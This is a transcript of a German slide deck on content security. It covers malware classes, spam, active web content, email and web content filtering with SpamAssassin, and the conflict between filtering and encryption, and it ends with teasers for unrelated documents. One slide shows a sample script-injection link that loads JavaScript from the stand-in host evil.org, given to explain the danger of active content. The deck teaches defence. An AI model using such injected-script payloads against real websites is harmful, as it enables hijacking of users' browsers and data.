Content Security. Jochen Schlichting IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Content Security

Größe: px
Ab Seite anzeigen:

Download "Content Security. Jochen Schlichting jochen.schlichting@secorvo.de. IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Content Security"

Transkript

1 IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Security Consulting GmbH, Karlsruhe Seite 1

2 Inhalt Einordnung Bedrohungen durch unerwünschte Inhalte Klassen von Malware Spam Aktive Inhalte Content Filterung bei und Webzugriffen Einsatz Ablauf Mechanismen Filterung und Schutz von sensitiven Informationen Ausblick Security Consulting GmbH, Karlsruhe Seite 2

3 Einordnung Security Consulting GmbH, Karlsruhe Seite 3

4 Einordnung beschäftigt sich mit Sicherheitsaspekten von einn- und ausgehenden Daten Erfassung, Analyse. Erkennung Verhinderung der Übertragung, Entfernung, Behebung... Übertragungswege U. a. Dateianhänge Webzugriffe U. a. Drive-by-Downloads Mobile und lokale Datenträger Sonstige Dateiübertragung Security Consulting GmbH, Karlsruhe Seite 4

5 Kritische Inhalte Malware Alias Malicious Code, Schadsoftware, bösartige Software, Computer-Viren,... Spam Alias Junk-Mail, Unsolicited Commercial , Unsolicited Bulk ,... Unerwünschte oder anstößige Inhalte Z. B. Rassismus, Pornographie, Belästigung, Mobbing,... Sensitive interne Informationen Unerwünschter Informationsabfluss Security Consulting GmbH, Karlsruhe Seite 5

6 Gefährdungen Empfang von kritischen Inhalten Gefährdung der eigenen IT-Infrastruktur Verlust von Daten Manipulation von Systemen Ausfall von Systemen Im Extremfall bis hin zur Gefährdung der Existenz der eigenen Organisation Minderung der Arbeitsproduktivität Betroffenheit und Frustration der eigenen Mitarbeiter Schadensersatzforderungen Versand von kritischen Inhalten Verlust von Geschäftsgeheimnissen Gefährdung von Geschäftspartnern, Kunden etc. Verstoß gegen Gesetze oder Rechtsvorschriften Schadensersatzforderungen, Imageverlust Security Consulting GmbH, Karlsruhe Seite 6

7 Problematik in der Praxis Quelle: Microsoft Security Intelligence Report, Volume 10, July through December 2010 Security Consulting GmbH, Karlsruhe Seite 7

8 Problematik in absoluten Zahlen Quelle: Microsoft Security Intelligence Report, Volume 10, July through December 2010 Security Consulting GmbH, Karlsruhe Seite 8

9 Bedrohungen durch unerwünschte nschte Inhalte Klassen von Malware Security Consulting GmbH, Karlsruhe Seite 9

10 Definition Computer-Virus Ein Computer-Virus ist eine nicht selbstständige Programmroutine, die sich selbst reproduziert und dadurch vom Anwender nicht kontrollierbare Manipulationen in Systembereichen, an anderen Programmen oder deren Umgebung vornimmt. Eine nicht selbstständige Programmroutine bedeutet, dass der Virus ein Wirtsprogramm benötigt. Quelle: https://www.bsi.bund.de/cln_183/contentbsi/publikationen/faltblaetter/f19kurzviren.html Security Consulting GmbH, Karlsruhe Seite 10

11 Grundelemente eines Computer- Virus Ausbreitungsteil Z. B. sich in den Bootblock eines eingelegten Datenträgers kopieren Z. B. sich selbst in eine nicht identifizierte Datei kopieren Z. B. sich selbst per an alle Adressbuchkontakte verschicken Auslöser für Schadfunktion (Trigger) Z. B. Zeitpunkt (Freitag, den 13.) Z. B. Benutzerverhalten (wenn der Benutzer eine bestimmte Datei öffnet) Z. B. Umgebung (wenn eine bestimmte Webseite online geht) Schadensroutine Z. B. Festplatte formatieren Z. B. Command&Control-Server des Angreifers im Internet kontaktieren (Rücksprung zum ursprünglichen Wirtsprogramm) Security Consulting GmbH, Karlsruhe Seite 11

12 Unterformen von Computer-Viren Datei-Viren Versteckt in Dateien mit ausführbaren Programmen Boot-Viren Versteckt im Boot-Block oder Boot-Lader auf der Festplatte Makro-Viren Versteckt im Daten-Dateien von Anwendungen mit Makro- Sprachbefehlen (typisch: Office-Makros) Stealth-Viren Mit besonderen Tarn-Mechanismen, ähnlich Rootkit-Funktionalität Polymorphe Viren Verändern bei gleicher Funktion von Infektion zu Infektion ihre Programmstruktur, um Entdeckung zu erschweren Oft in Kombination mit Verschlüsselung großer Teile des Viren- Codes Security Consulting GmbH, Karlsruhe Seite 12

13 Weitere Klassen von Malware Würmer Verbreitung aus eigener Kraft (selbst-replizierend) Unabhängig von einer Wirtsdatei Via oder über Schwachstellen anderer Netzwerkdienste Z. B. "SQL Slammer" Trojanische Pferde ( Trojaner ) Eigenständige Programme mit versteckten Schadfunktionen Rootkits Zur Verschleierung von Manipulationen im System Z. B. Unterdrückung der Anzeige von Schadcode-Prozessen Oft auch Einrichtung einer Hintertür ins System Sonderform: Hoax Kettenbrief mit Falschmeldung Verbreitung nicht selbständig, sondern über menschlichen Anwender Security Consulting GmbH, Karlsruhe Seite 13

14 Virus Hoax Virus Hoax Security Consulting GmbH, Karlsruhe Seite 14

15 Sober.c: : "Social Engineering" Wurm "Social Engineering" Wurm Security Consulting GmbH, Karlsruhe Seite 15

16 Weitere Klassen von Malware Datei-Viren Boot-Viren Makro-Viren Stealth-Viren Polymorphe Viren Würmer Trojaner Spyware Rootkits Hoax Diese Unterschiede spielen in der Praxis keine Rolle Security Consulting GmbH, Karlsruhe Seite 16

17 Malware in der Praxis Heute praktisch immer in Mischformen Kombination von Viren-, Wurm-, Trojaner- und Rootkit-Funktionalität Beispiel: Spam-Mail lockt Anwender auf eine manipulierte Webseite Drive-By-Infektion erfolgt über Schwachstelle im Browsers oder in einem Plugin oder einer Anwendung, die der Browser automatisch aufruft Z. B. PDF-Reader, Flash,... Payload der initialen Infektion ist ein Bootloader, der die Systemumgebung prüft und einen passenden Trojaner nachlädt Der Trojaner verankert sich mit Rootkit-Funktionalität im System und macht den befallenen Rechner zum Teil eines Bot-Netzes Über das Bot-Netz werden für Manipulationen anfällige Webserver gesucht und übernommen und Spam versendet Und so weiter und so fort... Abkürzungen PDF Portable Document Format Security Consulting GmbH, Karlsruhe Seite 17

18 Was ist Spam? Ein Nahrungsmittel Ein Sketch der Monty Pythons Massenpostings in den Usenet News, üblicherweise Werbung Unerwünscht empfangene s On the Junk Mail Problem (J. Postel, RFC 706, Nov. 1975!) UCE: Unsolicited Commercial UBE: Unsolicited Bulk Heute enthalten über 90% aller s Spam Abkürzungen RFC Request for Comment Quellen Antispam-Studie des BSI, 2005: Security Consulting GmbH, Karlsruhe Seite 18

19 Spam heute Spam als Geschäftsmodell Mit Spam lässt sich sehr viel Geld verdienen Wenige große Verursacher Spam zum Schnäppchenpreis Spam und Malware Spam selbst wird meist nicht zu Malware gerechnet Aber: starke Querbeziehungen zwischen Spam und Malware Spam ist (auch) Mittel für Phishing, Verbreitung von Malware etc. Botnetze sind (auch) Mittel zum Versand von Spam-Mails Technische Trends Greylisting funktioniert... noch Spammer setzen auf Einweg-IP-Adressen Gehackte Privat-PCs statt offene Relays Fast flux : Ändern der DNS-Einträge im Minutentakt Abkürzungen RFC Request for Comment Quellen Antispam-Studie des BSI, 2005: Security Consulting GmbH, Karlsruhe Seite 19

20 Warum bekomme ich Spam? Warum bekomme ich Spam? Security Consulting GmbH, Karlsruhe Seite 20

21 im WWW Malware und unerwünschte Inhalte per Webzugriff Ähnliche Problematik und ähnliche Mechanismen wie bei E- Mail, aber Zusätzlich aktive Inhalte (Java, ActiveX, Flash etc.) und Cookies Anwender wartet (inter-)aktiv auf Filter-Ergebnis Benutzerschnittstelle, z. B. Hinweise, Fortschrittsanzeige Grenzen verschwimmen HTML-formatierte s über Browser dargestellt Teilweise auch mit JavaScript etc. Inhalte erst beim Betrachten der via HTTP geladen Web-Mailer: Hintertür an SMTP-Gateways vorbei Im Unternehmen: z. B. Outlook Web Access oder inotes/domino Web Zugriff in der Regel geschützt über SSL/TLS Diverse Fre Provider Abkürzungen HTTP HyperText Transfer Protocol SMTP Simple Mail Transfer Protocol WWW World Wide Web Security Consulting GmbH, Karlsruhe Seite 21

22 Aktive Inhalte Ausführbare (aktive) Inhalte von WWW-Seiten oder s Werden auf Benutzerrechner ausgeführt, daher schwer zentral zu filtern Scriptsprachen (z. B. JavaScript, VBScript) Z. B. Script-Befehle direkt in HTML-Seite oder gar in URL <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</a> Herunterladbare Programmteile ( Mobile Code ) Java-Applets, ActiveX Controls Plug-Ins, Applikationen, z. B. Flash oder Videostreams Laden und Ausführen oft ohne Wissen des Benutzers Feststellung der Herkunft nicht ohne Weiteres möglich Nicht permanent auf System installiert Security Consulting GmbH, Karlsruhe Seite 22

23 Schutz gegen bösartige b Aktive Inhalte Schlechter Schutz gegen DoS auf lokalem System Sicherheitsmodelle Sandbox kontrolliert Zugriff auf System Vor allem: Java2 Standardeinstellung in Browser: keine Zugriffe JavaScript im Browser erlaubt keinen Dateizugriff ActiveX Controls haben vollen Zugriff Im kommerziellen Umfeld unbrauchbar (jenseits des Intranets) Probleme: Fehlerhaftes oder kein Sicherheitsmodell (z. B. ActiveX) Fehler in der Implementierung der Sicherheitsfunktionen Lösungsansatz: Digitale Signaturen Vor allem: Java2 Abkürzungen DoS Denial of Service Security Consulting GmbH, Karlsruhe Seite 23

24 Content Filterung bei E und Webzugriffen Einsatz Ablauf Mechanismen Security Consulting GmbH, Karlsruhe Seite 24

25 Ansätze zur Abwehr von Malware (Abschottung von Systemen) Lokale Viren -Scans Content-Filterung bei der Übertragung Gleichermaßen gegen Malware wie gegen Spam und Informationsabfluss (Verhaltensanalyse von unbekannter Software) (Awareness-Maßnahmen bei Mitarbeitern) Security Consulting GmbH, Karlsruhe Seite 25

26 Lokale Viren -Scans (Malware- Scans) On-Access-Scan Überprüfung bei Zugriff auf Dateien (lesend und/oder schreibend) On-Demand-Scan Regelmäßige Überprüfung sämtlicher Dateien Best Practice: Möglichst nicht abschaltbar! Zentrales Management der dezentralen Malware-Scanner Automatisches Update... der Malware-Signaturen... der Scan-Engine Security Consulting GmbH, Karlsruhe Seite 26

27 Malware-Scans Scans: : Generelle Problematik Es gibt keine 100%ig zuverlässige Scan-Methode Soweit möglich Scan-Software unterschiedlicher Hersteller einsetzen Reaktive Scans Basieren auf Malware-Signatur-Dateien Schutz (Erkennungsgüte) abhängig von Aktualität der Signatur-Dateien Hersteller müssen für jede neue oder entsprechend modifizierte Malware neue Signaturen bestimmen und verteilen Ansatz stößt zunehmend an seine Grenzen Proaktive Scans Heuristische Scans Können u. U. auch bisher nicht bekannte Malware erkennen Können daher aber auch vermehrt zu falsch-positiven Ergebnissen führen Erfordern mehr Ressourcen und Rechenzeit als Signatur-basierte Scans Abkürzungen URL Universal Resource Locator Security Consulting GmbH, Karlsruhe Seite 27

28 Wo Scannen und Filtern? Quelle: Security Consulting GmbH, Karlsruhe Seite 28

29 Mögliche Filterpunkte Es kann (und sollte) an unterschiedlichen Stellen gefiltert werden Soweit möglich Scan-Software unterschiedlicher Hersteller einsetzen Geeignet: alle Stellen, an denen Daten komplett vorliegen, z. B. Firewall Gateway, Proxy-Server, -Gateway etc. Zentrale Mail- und Fileserver Dezentrale PC-Arbeitsplätze Mobile Endgeräte Ungeeignet: alle Stellen, an denen Daten nicht unter Kontrolle sind oder nicht komplett vorliegen Jenseits des Unternehmensnetzes Netzwerkinfrastruktur (Router, Switches) Spam- und Malware-Filter nutzen sehr ähnliche Ansätze Häufig in einem Produkt kombiniert Security Consulting GmbH, Karlsruhe Seite 29

30 Genereller Ablauf der Filterung 1. Erfassung von Verbindungen und übertragenen Inhalten Eingehend oder ein- und ausgehend Mögliche Blockade beim Verbindungsaufbau: Black/White/Grey- Listing 2. Inhaltsanalyse und Dekomposition Mail-Header, HTTP-Header, MIME-Parts, Anhänge Entpacken von Archiven 3. Klassifikation Virenscan / Malwarescan Inhaltsfilterung In Deutschland in der Regel mitbestimmungspflichtig, Abstimmung mit Betriebs-/Personalrat erforderlich siehe Vortrag Recht Weitere Formen der Analyse 4. Aktion / Ereignis Markierung/Ergänzung, Quarantäne oder Löschung Abkürzungen MIME Multipart Internet Mail Extensions Security Consulting GmbH, Karlsruhe Seite 30

31 1. Erfassung Durch zentralen, transparenten Proxy Zwangsumleitung aller IP-Pakete durch Firewall / Paketfilter Für HTTP / SMTP, ggf. auch POP3, IMAP Durch Content-Filter als Mail-Relay Standardaufbau in Verbindung mit Firewall Firewall unterbindet direkten Mailtransfer Content-Filter im Internet als Mailserver sichtbar Auf zentralem Mailsystem Content-Filter / Virenscanner integriert in zentrale Mailserver Vorteil: auch rein interne Mails werden erfasst Nachteile: relative enge Integration in Mailsystem, ggf. Anpassungen bei Versionswechsel notwendig, zusätzliche Belastung des zentralen Mailsystems Abkürzungen IMAP Internet Message Access Protocol POP3 Post Office Protocol version 3 SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 31

32 1. Erfassung Durch zentralen, transparenten Proxy Zwangsumleitung aller IP-Pakete durch Firewall / Paketfilter Für HTTP / SMTP, ggf. auch POP3, IMAP Durch Content-Filter als Mail-Relay Zentrale Filter sind unabdingbar Standardaufbau in Verbindung mit Firewall Firewall unterbindet direkten Mailtransfer Content-Filter im Internet als Mailserver sichtbar Auf zentralem Mailsystem Content-Filter / Virenscanner integriert in zentrale Mailserver Vorteil: auch rein interne Mails werden erfasst Nachteile: relative enge Integration in Mailsystem, ggf. Anpassungen bei Versionswechsel notwendig, zusätzliche Belastung des zentralen Mailsystems Abkürzungen IMAP Internet Message Access Protocol POP3 Post Office Protocol version 3 SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 32

33 1. Black/White/Grey-Listing Online-Check der IP-Adresse beim Verbindungsaufbau Gegen eine Realtime Blacklist (RBL) Check bzgl. offener Proxies, Dial-up-Adressbereichen, etc. Hoher Pflegeaufwand! Wer pflegt RBLs? Gefahr von ungewollten Blockaden! Gegen eine Whitelist Nur Mailserver bekannter Unternehmen Hoher Pflegeaufwand, praktisch meist nicht durchsetzbar Greylisting Erzwungene Zeitverzögerung beim Sendeversuch als temporäre Blockade Keine Zuverlässigkeitsprobleme: Setzt lediglich vollständig SMTP-konformes Verhalten des Senders voraus bei Spam-Versand oft (noch) nicht der Fall Für den Administrator mit relativ geringem Aufwand konfigurierbar Kann in jeder der drei Formen den Mail-Server erheblich entlasten Abkürzungen IP Internet Protocol RBL Realtime Blackhole List SMTP Simple Mail Transfer Protocol Security Consulting GmbH, Karlsruhe Seite 33

34 2. Analyse der Header Auswerten aller (Mail) Headereinträge From, To, Cc, Subject, Date Mail-Adressen: To: Sehr leicht fälschbar Ungültige / gefälschte Host-/Domainnamen Ungültige / gefälschte Received-Zeilen Zeitzonen: (EST) IP-Adressen: Message-ID Maximale Anzahl an Empfängern MIME-Header-Felder (Nicht-) Vorhandensein bestimmter Header-Felder Vorsicht, um keine Mailinglisten auszusperren Abkürzungen Cc Carbon Copy EST Eastern Standard Time ID Identification IP Internet Protocol MIME Multipurpose Internet Mail Extensions Security Consulting GmbH, Karlsruhe Seite 34

35 2. Weitere Analyse und Dekomposition MIME-Parts Alternative Darstellung: Text und/oder HTML, RTF,... Anhänge S/MIME Verschlüsselung und/oder Signatur Beliebige Schachtelung möglich Dateiformate angehängter Dateien Anhand von Datei-Endung, MIME-Typ und/oder Formatprüfung Für den Administrator mit relativ geringem Aufwand konfigurierbar Archiv- und Containerformate Z. B. ZIP, RAR, TAR, CAB, JAR,... Rekursives Entpacken notwendig Kompressionsbomben sprengen Speicherplatz Rekursionsbomben entpacken unendlich oft sich zu sich selbst Abkürzungen CAB Cabinet HTML HyperText Markup Language JAR Java Archive MIME Multipurpose Internet Mail Extensions RAR (Eugene) Roshal's Archiver RTF Rich Text Format S/MIME Secure MIME TAR Tape Archive Security Consulting GmbH, Karlsruhe Seite 35

36 3. Textanalyse: Inhaltsfilterung Lexikalische Analyse / Schlüsselwörter / Muster-Suche Scannen nach bestimmten Schlüsselwörtern oder Textpassagen...impr0ve your s.x life... Für den Administrator mit relativ geringem Aufwand konfigurierbar Schnelle Eingreifmöglichkeit bei neuen Würmern Missbrauchsmöglichkeiten liegen auf der Hand Scannen nach bestimmten URLs URLs, von denen Inhalt nachgeladen werden soll Kann ggf. mit lexikalischer Analyse mit erledigt werden Scannen nach bestimmten (HTML-) Formatierungen Z. B. nur Grossbuchstaben, viele Bilder, etc. Relativ hohe Fehlerrate, schwierige eindeutige Klassifizierung Individuelle Filter? Security Consulting GmbH, Karlsruhe Seite 36

37 3. Textanalyse: Bayes Filter Statistisches Verfahren zur Spam-Klassifikation Geht zurück auf den Satz von Bayes über bedingte Wahrscheinlichkeiten Wie hoch ist die Wahrscheinlichkeit, dass eine eingehende Spam ist, wenn sie eine bestimmte Wortkombination enthält? Bewertet anhand zuvor empfangener s ( Training des Filters) Benötigt gewisse Mindestanzahl von vorklassifizierten Spam- und Nicht-Spam-Mails Kann bei jeder neu klassifizierten Mail weiter lernen Häufig mit Scoring-Verfahren kombiniert Besonders, um falsch-positive Ergebnisse zu reduzieren Unscharfe Prüfsummen des Inhalts ( fuzzy checksums ) Gewichteter Anteil des Bayes-Filters Gewichteter Anteil weiterer Filtermethoden Gewichtung und Schwellwert können individuell variiert werden Security Consulting GmbH, Karlsruhe Seite 37

38 3. Weitere Analysekriterien Typ von Dateianhängen Besonderes Augenmerk auf ausführbaren Dateitypen Problem: Was ist alles ausführbar (.cmd,.scr,.pif,...)? Multimedia lässt Grenzen verschwimmen Skript-Code in HTML-Dateien, Flash-Dateien, PDF-Dateien... Anzahl und Größe von Dateianhängen Kompletter HTTP-Strom (WAF) Virenscan / Malwarescan Zahlreiche Tools verfügbar Z. B. SpamAssassin mit diversen Plug-Ins Abkürzungen HTML HyperText Markup Language Security Consulting GmbH, Karlsruhe Seite 38

39 4. Aktion / Ereignis Behandlung der geprüften je nach Ergebnis der Klassifikation Ggf. Modifikation der geprüften Entfernung von Viren Disclaimer anfügen (von zweifelhaftem Nutzen) Markierung für lokale Filterung Subject-Tag (z. B. [VIRUS FOUND] Originalbetreff ) Erweiterte Header-Felder (z. B. X-infected: yes ) Zurückweisen, Weiterleiten, Quarantäne oder Löschen Rechtlichen Rahmen beachten Benachrichtigungsmails Erfordern genaue Planung An Absender, Empfänger und/oder Administratoren Sollte nicht selbst in Spam ausarten Security Consulting GmbH, Karlsruhe Seite 39

40 Beispiel: SpamAssassin From: To: Subject: **SPAM** =?ISO JP?B?NDAbJEI6UDBKPmUkRz80JGI/SEJOJGJMfiRkJDUkbCQ/JCRKfSRPGyhC?= =?ISO JP?B?WxskQkx+JGQkNzJIGyhCXRskQiRYJCoxWyQ3MjwkNSQkISMbKEI=?= Date: Mon, 11 Aug :04: [...] X-Spam-Prev-Subject: =?ISO JP?B?NDAbJEI6UDBKPmUkRz80JGI/SEJOJGJMfiRkJDUkbCQ/JCRKfSRPGyhC?= =?ISO JP?B?WxskQkx+JGQkNzJIGyhCXRskQiRYJCoxWyQ3MjwkNSQkISMbKEI=?= X-Spam-Flag: YES X-Spam-Checker-Version: SpamAssassin ( ) on connect.secorvo.de X-Spam-Level: ****** X-Spam-Status: Yes, score=7.0 required=2.9 tests=date_in_past_06_12, FORGED_MUA_OUTLOOK,FORGED_YAHOO_RCVD,FROM_ENDS_IN_NUMS,NO_REAL_NAME, PLING_QUERY autolearn=no version=3.0.4 X-Spam-Report: * 0.2 NO_REAL_NAME From: does not include a real name * 0.5 FROM_ENDS_IN_NUMS From: ends in numbers * 0.9 PLING_QUERY Subject has exclamation mark and question mark * 0.2 DATE_IN_PAST_06_12 Date: is 6 to 12 hours before Received: date * 2.2 FORGED_YAHOO_RCVD 'From' yahoo.com does not match 'Received' headers * 3.0 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook [...] Security Consulting GmbH, Karlsruhe Seite 40

41 Filterung und Schutz von sensitiven Informationen Security Consulting GmbH, Karlsruhe Seite 41

42 Content-Filter und Verschlüsselung sselung Unternehmens-Netz???...teile ich Ihnen mit... Arbeitsplatz-PC Q a$tlk %3ß9 8ü95??? a$tlk %3ß9 8ü95 "Internet" a$tlk %3ß9 8ü95 Zentrale Content-Filterung und Ende-zu-Ende Verschlüsselung sind unverträgliche Mechanismen Eingehend wie ausgehend Security Consulting GmbH, Karlsruhe Seite 42

43 Content-Filter und Verschlüsselung sselung Grundsätzlicher Lösungsansatz: Content-Filter beim Endpunkt der verschlüsselten Kommunikation Bei Priorität Ende-zu-Ende Verschlüsselung Dezentrales Content-Filtering und dezentraler Content-Scan Bei Priorität zentraler Content-Filter Zentrales Verschlüsselungs-Gateway kombiniert mit zentralem Content-Filter Zusatznutzen: Vereinfacht Vertretung und Delegation, Message Recovery Kann Ende-zu-Ende Verschlüsselung nicht in allen Fällen ersetzen Ansätze zum Unterbrechen einer Ende-zu-Ende-Verschlüsselung Umverschlüsseln an zentralem -Verschlüsselungs-Gateway SSL-Breaker für HTTPS-geschützte Webzugriffe Unterstützen i. d. R. keine SSL/TLS-Client-Authentifikation Erfordert Zugriff auf Schlüssel und Vertrauenskonfig. der Anwender Sicherheitstechnische und rechtliche Konsequenzen beachten! Abkürzungen HTTPS Secure HyperText Transfer Protocol SSL Secure Socket Layer TLS Transport Layer Security Security Consulting GmbH, Karlsruhe Seite 43

44 Ausblick Security Consulting GmbH, Karlsruhe Seite 44

45 Ausblick Filtern ist nicht trivial Es muss zentral und dezentral gefiltert werden Filtern von s reicht nicht aus Produkte aus verschiedenen Richtungen wachsen durch Erweiterungen zusammen Content-Filter klassisch als Unterfunktion einer Firewall Viele unterschiedliche Protokolle sind zu filtern Web Application Firewalls (WAF) nehmen an Bedeutung zu Data Leakage Prevention (DLP) als Zukunft der? Neue (und alte) Herausforderungen Nadelöhreigenschaft Skalierbarkeit, Hochverfügbarkeit Rechtliche Rahmenbedingungen beachten Vorsicht beim Blockieren Abkürzungen DLP Data Leakage Prevention, Dats Loss Prevention WAF Web Application Firewall Security Consulting GmbH, Karlsruhe Seite 45

46 Security Consulting GmbH, Karlsruhe Seite 46

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003

Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003 Spam-Filterung Sonderveranstaltung Dr. Gabriele Dobler, Dr. Reiner Fischer, Ulrich Nehls, Gunther Heintzen 12.Dezember 2003 12.12.2003 1 Übersicht Entwicklung des Mail-Aufkommens Ziele des RRZE Spam-Bewertung

Mehr

- Blockieren der E-Mail x x - Entfernen von Anhängen x x Hochladen von Anhängen ins Web Portal mit optionaler Quarantäne.

- Blockieren der E-Mail x x - Entfernen von Anhängen x x Hochladen von Anhängen ins Web Portal mit optionaler Quarantäne. Inhalt Anti-Spam Features... 2 Signatur und Verschlüsselung Features... 3 Large File Transfer 4... 5 Fortgeschrittenes E-Mail-Routing... 6 Allgemeine Features... 6 Reporting... 7 www.nospamproy.de Feature

Mehr

Email: Systeme und Möglichkeiten an der Universität Bayreuth. Jour fixe für IT Verantwortliche SS 2012

Email: Systeme und Möglichkeiten an der Universität Bayreuth. Jour fixe für IT Verantwortliche SS 2012 Email: Systeme und Möglichkeiten an der Universität Bayreuth Jour fixe für IT Verantwortliche SS 2012 1 Übersicht: Emailvolumen Zwei getrennte Mailsysteme für Studenten und Mitarbeiter Mailbenutzer mit

Mehr

Computeranwendung in der Chemie Informatik für Chemiker(innen) 5. Internet

Computeranwendung in der Chemie Informatik für Chemiker(innen) 5. Internet Computeranwendung in der Chemie Informatik für Chemiker(innen) 5. Internet Jens Döbler 2003 "Computer in der Chemie", WS 2003-04, Humboldt-Universität VL5 Folie 1 Dr. Jens Döbler Internet Grundlagen Zusammenschluß

Mehr

12. Kieler OpenSource und Linux Tage. Wie funktioniert eigentlich Mail? 20.09.2014, Frank Agerholm, Linux User Group Flensburg e.v.

12. Kieler OpenSource und Linux Tage. Wie funktioniert eigentlich Mail? 20.09.2014, Frank Agerholm, Linux User Group Flensburg e.v. 12. Kieler OpenSource und Linux Tage Wie funktioniert eigentlich? 20.09.2014, Frank Agerholm, Linux User Group Flensburg e.v. Frank Agerholm Vorstellung Linux System Engineer RZ-Administration Konzeptionierung

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Anti-Spam-Tools. Gliederung. Stefan Appenburg, René Marx, Michael Günther WS 2004/05

Anti-Spam-Tools. Gliederung. Stefan Appenburg, René Marx, Michael Günther WS 2004/05 Anti-Spam-Tools Stefan Appenburg, René Marx, Michael Günther WS 2004/05 1 Einleitung Anforderungen Spamcop Spampal Hidemail Outlook-Filter Gliederung 2 Einleitung Weltweit bieten mehr als 70 Hersteller

Mehr

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen?

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Lange Nacht der Wissenschaften 2007 Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Manuel Selling Humboldt Universität zu Berlin ZE Computer und Medienservice Abt. Systemsoftware und

Mehr

Karlsruher IT-Sicherheitsinitiative - 26. April 2001. "For your eyes only" Sichere E-Mail in Unternehmen. Dr. Dörte Neundorf neundorf@secorvo.

Karlsruher IT-Sicherheitsinitiative - 26. April 2001. For your eyes only Sichere E-Mail in Unternehmen. Dr. Dörte Neundorf neundorf@secorvo. Karlsruher IT-Sicherheitsinitiative - 26. April 2001 "For your eyes only" Sichere E-Mail in Unternehmen Dr. Dörte Neundorf neundorf@secorvo.de Secorvo Security Consulting GmbH Albert-Nestler-Straße 9 D-76131

Mehr

crypta.net email System Quickstart Guide für Benutzer

crypta.net email System Quickstart Guide für Benutzer crypta.net email System Quickstart Guide für Benutzer support@crypta.net, Version 20.11.2007 Inhaltsverzeichnis 1. Kurzübersicht...3 1.1. Zugriff auf Postfächer...3 1.2. Persönliche Einstellungen...3 1.3.

Mehr

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL TCP/IP: Standard Protokolle Konrad Rosenbaum, 2006/7 DNS - Domain Name System hierarchische, global verteilte Datenbank löst Namen in IP-Adressen auf Host hat einen primären Nameserver, der Fragen selbst

Mehr

E-Mails automatisch lesen. Markus Dahms

E-Mails automatisch lesen. Markus Dahms <dahms@fh-brandenburg.de> 1 Gliederung 1. Der Weg der E-Mails 2. fetchmail: Einsammeln 3. procmail: Filtern & Sortieren 4. spamassassin: Entsorgen 5. Andere hilfreiche Werkzeuge 6. Die mächtigste Waffe:

Mehr

Gliederung Erkennung anhand des Absenders. Methoden zur Filterung und Blockung. Alexandru Garnet

Gliederung Erkennung anhand des Absenders. Methoden zur Filterung und Blockung. Alexandru Garnet Methoden zur Filterung und Blockung von Mails Alexandru Garnet Seminar Intenetkommunikation WS 2004/2005 Prof. Dr. Martin Leischner 1 Gliederung Erkennung anhand des Absenders Whitelist/Blacklist Realtime

Mehr

Malware und Spam 2008

Malware und Spam 2008 Malware und Spam 2008 Aktuelle Trends und Gegenmaßnahmen Ralf Benzmüller G DATA Security Labs Geschützt. Geschützter. G DATA. Agenda G DATA AntiVirus 2008 Malware G DATA Internet Security 2008 Firewall

Mehr

Betriebskonzept E-Mail Einrichtung

Betriebskonzept E-Mail Einrichtung Betriebskonzept E-Mail Einrichtung www.bolken.ch Klassifizierung öffentlich - wird an die E-Mail Benutzer abgegeben Versionenkontrolle Version Status Verantwortlich Datum 4.0 Genehmigt Gemeinderat 25.03.2015

Mehr

SPONTS. Kurt Huwig Vorstand iku Systemhaus AG. 2005 iku Systemhaus AG http://www.iku ag.de/

SPONTS. Kurt Huwig Vorstand iku Systemhaus AG. 2005 iku Systemhaus AG http://www.iku ag.de/ SPONTS Kurt Huwig Vorstand iku Systemhaus AG Was ist SPONTS SPONTS ist ein Linux-basierter modularer SMTP-Proxy Linux basiert gehärtetes Linux auf Debian/Woody-Basis hohe Stabilität hohe Sicherheit kleiner

Mehr

E-Mail - Grundlagen und

E-Mail - Grundlagen und E-Mail - Grundlagen und Einrichtung von Eugen Himmelsbach - Aufbau einer E-Mailadresse Inhalt - Woher bekommt man eine E-Mailadresse - Was wird benötigt - E-Mailserver - POP-Server - IMAP-Server - SMTP-Server

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Sicherheit im Internet - Datenschutz als Standortvorteil im E-Business -

